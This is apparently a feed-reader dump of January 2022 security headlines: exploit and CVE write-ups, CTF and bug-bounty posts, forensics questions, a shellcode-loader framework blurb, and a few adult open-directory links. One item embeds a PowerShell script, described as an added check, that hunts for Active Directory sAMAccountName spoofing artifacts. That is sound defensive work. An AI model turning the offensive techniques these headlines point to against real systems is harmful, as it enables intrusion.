    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    Hey guys, I hope you're doing well. Today I share some Linux privesc resources that help you in solving CTFs and in web pentesting and… Continue reading on Medium »  ( 1 min )
    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers, I am Aditya. Recently, while hunting around a coaching site, I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: understand the difference
    Just as a football team has an attack and a defence, the idea in cybersecurity is similar. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and I need to find ROP gadgets from vmlinux. This is not accessible in the target and, as far as I understand, U-Boot loads the vmlinux on boot, but this restricts me from easily finding the gadgets I need. Is there any resource you can suggest, as I'm clearly missing something and my research till now didn't give me clear answers? Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
    Malicious website identification with a GCN model over a heterogeneous graph of cross-site redirects and text data by ourren; Detecting reflection-amplification DDoS attacks at Internet exchange points by Avenger; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH v10 and this year I really want to improve the bling on my resume tbh. I am currently doing web, mobile and pos testing. Your help would be really appreciated in suggesting certificates that are good value for money and informative. I know OSCP is there, but I need more hands-on for that, which I am working on, but in the meantime I don't want to lose time. I have a potential interest in cloud security but am also open to other fields and certifications. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malware. Maybe use Splunk to write alerts, queries etc. to identify the malware. (Problem is that it only has a 60-day trial; I need it for at least 6 months.) Should I be worried about VM escape if I run this malware in a secure VM environment? What should be the main focus of this project? Run the malware, then just identify it with alerts and write write-ups? Would this idea be good for a 6-month university project? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen Windows event 1102 (The audit log was cleared) activity on a Windows server that was performed by SYSTEM? It happened on a test VM I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup, and a few hundred logs were deleted, but they were future-dated logs (which doesn't make sense). I'm sure it's not a timezone issue; the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Real or Fake? How to Spoof Email
    I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why email sender addresses are so easy to forge and... The post Real or Fake? How to Spoof Email appeared first on TrustedSec.  ( 14 min )
  • Open

    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

    My pentesting study notes: Java deserialization, the CB chain
    Strictly speaking, this article is part of my study notes on Java gadget chains.  ( 1 min )
    An article on PHP deserialization
    An article on PHP deserialization  ( 1 min )
    FreeBuf Morning Report | Multiple EA Sports FIFA 22 players hacked; e-waste is also a cybersecurity problem
    Several EA Sports FIFA 22 players appear to have been hacked, saying they lost access to their personal EA and email accounts.  ( 1 min )
    Interview with the head of Alibaba Cloud SASE: making workplace security simpler
    Can SASE really "replace existing network and security models" as Gartner predicts? How was Alibaba Cloud SASE built, and what changes can it bring to enterprises?  ( 1 min )
    Europol ordered to delete data unrelated to criminal investigations
    On January 3, the European Data Protection Supervisor required Europol to delete large volumes of stored personal data with no significant link to criminal investigations.
    Multiple EA Sports FIFA 22 players attacked
    A growing number of EA Sports FIFA 22 players, including well-known streamers, report that their EA accounts were hacked and that they can no longer access their personal EA and email accounts.  ( 1 min )
    Facebook launches a "Privacy Center" to educate users about data collection and privacy options
    Its maze-like menus and obscure wording leave people doubting how effective it is at protecting user data.  ( 1 min )
    "Immunity" versus "virus": the adversarial game in cyberspace
    Cyber risk, like "patient zero", is a dynamic research topic that is not easily hit in one shot; it has to be approached step by step through searching, judging, confirming and self-correction, which is the process of coming to understand the "virus".
    The "fragile" Internet of Vehicles
    Compared with the fast-moving connected-vehicle industry, connected-vehicle security is clearly painstaking work; automakers must learn to slow down and dig in before they can truly solve it.  ( 1 min )
    2021 cryptomining trojan trend report
    The Sangfor threat intelligence team continuously tracks active cryptomining trojan families using cloud data, detected multiple cryptomining outbreaks, and from them summarized several trends in how mining trojans are developing.  ( 1 min )
    Defining "important data" under China's existing laws and regulations
    2021 is over; looking back at the year's end on what I did, the thing that left the deepest impression is probably the term "data security".  ( 1 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD, which ran XP, doesn’t boot anymore. I can access the files, however. I’m trying to find out when a specific account was created on this drive. It was created from the original admin account, which was also deleted and replaced later on. The user account files of the first admin account were saved, but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine, so it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages, then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would affect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text and it downloaded something on my phone that I can’t find. My iPhone can’t make calls now. I double-clicked my home button during a call and something glitched; I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app, then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on, then the call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a Raspberry Pi. I have a laptop ready for deployment that will be connected via LAN in the client's office; what would be the best way for me to remote into the laptop? In the past I've used TeamViewer but that hasn't been great display-wise; the reliability never dropped though, which is the most important thing. Would it be worth getting a VPS and configuring my own VPN using OpenVPN for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    Got this message; was I hacked? Or is there something I am missing? "Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it." I cut out the number just in case. I actually had this number at one point, but what does this mean? I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook, which I don't, and he's in the IT field and has a Google Nest in our house he bought for our mother. I'm thinking he's manipulating that to steal my credentials as well, but I'm not sure. So long story short, I cleaned up all possible security breaches my chump brother might have had control over and this happens. I'm thinking he was on my Microsoft account because he jumps in my online COD lobbies with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Acceleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    Chrome 98 Beta: Color Gradient Vector Fonts, Region Capture Origin Trial, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 98 is beta as of January 10, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android.  COLRv1 Color Gradient Vector Fonts In this version Chrome supports COLRv1 color gradient vector fonts as an additional new font format. A color font contains glyphs with multiple colors in them, which can be for example an emoji or a country flag or a multi-colored letter. COLRv1 is an evolution of the COLRv0 font format intended to make color fonts widespread on the web. COLRv1 fonts bring expressive visua…
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
    SecWiki Weekly (Issue 410) by ourren; Rootkit research series: highly stealthy, highly persistent threats on the Windows platform by ourren; Ten typical cases of personal-information violations in 2021 by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    「网安知识大陆」 (Cybersecurity Knowledge Continent) 1.0 officially launches!
    The official 1.0 release of 「网安知识大陆」, which gathers high-quality content into a one-stop platform, has arrived.
    FreeBuf Morning Report | Ministry of Public Security publishes ten typical personal-information crime cases; Facebook launches Privacy Center
    Over the year, public security organs nationwide solved more than 9,800 cases of infringement of citizens' personal information, arrested 17,000 suspects, and published the ten typical personal-information crime cases of 2021.  ( 1 min )
    Hands-on attacks against the SNMP service
    The SNMP service in switch security configuration  ( 1 min )
    Bookmark edition: a roundup of 2021 policies and regulations, national standards, reports and white papers
    This article comprehensively compiles the major domestic policies and regulations issued in 2021, selected national standards, and research reports and white papers from major institutions.  ( 1 min )
    A casual discussion: the three-administrator model in MLPS (等级保护)
    The system administrator, audit administrator and security administrator roles must not be held by one person; ideally three different people fill them.
    The Shanghai Counter-Espionage Security Precautions Regulations published, taking effect January 1, 2022
    The regulations, in seven chapters and thirty-five articles, further improve the legal framework for counter-espionage security precautions and safeguard national security in accordance with the law.
    Night Sky, a new ransomware targeting enterprises
    Security researchers recently warned that a new ransomware called "Night Sky" is active, targeting corporate networks and stealing data in double-extortion attacks.  ( 1 min )
    Online booking platform FlexBooker leaks data on more than 3.7 million accounts
    FlexBooker advises users to remain vigilant and review account statements and credit reports for suspicious transactions.  ( 1 min )
    Gin-Vue-admin vertical privilege escalation vulnerability and code analysis - CVE-2022-21660
    Users get the chance to escalate privileges because, ultimately, there is a logic flaw in the code.  ( 3 min )
    France fines Google and Facebook a combined 210 million euros for privacy rule violations
    France fined Google 150 million euros and Facebook 60 million euros for not offering users a simple option to refuse cookie tracking.  ( 1 min )
    Reverse-engineering tutorial (3): four ways to quickly locate a given piece of code
    When debugging, the main() function is not located directly at the executable's entry point (EP); what sits there is the start-up function generated by the development tool (Visual C++).  ( 1 min )
    Reverse-engineering tutorial (1): debugging code
    This series is written for people preparing to get started with reverse engineering. Come and learn together!  ( 1 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
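    As an added check, not taken from the netbiosX post above, the PowerShell below hunts a domain for the two artifacts the sAMAccountName spoofing technique (CVE-2021-42278) leaves behind: computer objects whose sAMAccountName lacks the trailing '$', and Security event 4781 on a domain controller recording a computer account being renamed to a DC-like name. It assumes the RSAT ActiveDirectory module, a domain-joined host that can read the domain and the DC's Security log, and uses 'DC01' and the seven-day lookback as placeholders.

```powershell
# Added hunting script for sAMAccountName spoofing artifacts (CVE-2021-42278 / CVE-2021-42287).
# Assumptions: RSAT ActiveDirectory module is installed, the caller can read the domain,
# and the Security log on the DC is readable. 'DC01' and the 7-day window are placeholders.
Import-Module ActiveDirectory

# 1. Computer objects whose sAMAccountName lacks the trailing '$'.
#    A normal computer account is "HOST$"; one without the '$' can be made to
#    collide with a DC's name during the attack.
$noDollar = Get-ADComputer -LDAPFilter '(&(objectClass=computer)(!(sAMAccountName=*$)))' `
    -Properties sAMAccountName, whenCreated, whenChanged, 'mS-DS-CreatorSID'

foreach ($c in $noDollar) {
    [pscustomobject]@{
        Check             = 'sAMAccountName without $'
        DistinguishedName = $c.DistinguishedName
        sAMAccountName    = $c.sAMAccountName
        WhenCreated       = $c.whenCreated
        WhenChanged       = $c.whenChanged
        # mS-DS-CreatorSID is populated when a non-admin user created the object
        # via the machine account quota, which is the usual way the attack starts.
        CreatorSID        = $c.'mS-DS-CreatorSID'
    }
}

# 2. Security event 4781 ("The name of an account was changed") on the DC.
#    Flag renames that drop the '$' or whose new name matches a DC's hostname.
$dcNames = (Get-ADDomainController -Filter *).Name | ForEach-Object { $_.ToUpper() }
$since   = (Get-Date).AddDays(-7)
$events  = Get-WinEvent -ComputerName 'DC01' `
    -FilterHashtable @{ LogName = 'Security'; Id = 4781; StartTime = $since } `
    -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Pull the named EventData fields out of the event XML.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $old = $data['OldTargetUserName']
    $new = $data['NewTargetUserName']

    $droppedDollar = ($old -like '*$') -and ($new -notlike '*$')
    $looksLikeDC   = $dcNames -contains $new.ToUpper().TrimEnd('$')
    if ($droppedDollar -or $looksLikeDC) {
        [pscustomobject]@{
            Check   = 'Event 4781 suspicious rename'
            Time    = $e.TimeCreated
            OldName = $old
            NewName = $new
            Subject = $data['SubjectUserName']
        }
    }
}
```

    Run it from a workstation with RSAT against each DC in turn (the 4781 events are logged only on the DC that processed the rename). Any hit on the first check should be treated as a live finding; hits on the second check are historical and should be correlated with 4742 (computer account changed) and 4768/4769 Kerberos events around the same time.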
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

    searchsploit vs msfconsole exploit names
    Hi! Let's say I am looking for some webmin exploit through searchsploit: searchsploit webmin ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is it usable information to have these numbers to a person who is undefined? Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into the SolarWinds hack and I noticed that the malware called back home using a DGA DNS algorithm, but I'm struggling to understand how the hackers knew which domain to buy/use for their malware. Based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names, but how do the C2 and the malware meet at a certain domain name? Especially if the malware generates 50k domains? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK, what’s the Reddit hack where you can’t send a private message because it thinks you have over 100 letters of text? This is currently going on. I was banned for something, I have no clue why, trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my findings in a private pentest program that let me take over another user's account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but I think it is worth sharing, so let's get started. Continue reading on Medium »  ( 1 min )

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )

    SecWiki News 2022-01-09 Review
    No news updated today~ For more of the latest articles, visit SecWiki  ( 2 min )

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone, It was 7 January 2022; when I woke up from sleep I saw an email from MSRC. I thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )

    SecWiki News 2022-01-08 Review
    Useful Useless Models: Modeling Approaches for Complex Problems in Cybersecurity by ourren; New APT Trend: Increased Use of Strategically Dormant Domains, Hard to Detect by ourren; 2021 Cybersecurity Industry Landscape Summary by ourren; 2021 Development Trends of Major Global Cybersecurity Threats by ourren; For more of the latest articles, visit SecWiki  ( 2 min )

    How does SAMBA differ between NULL authentication and anonymous authentication?
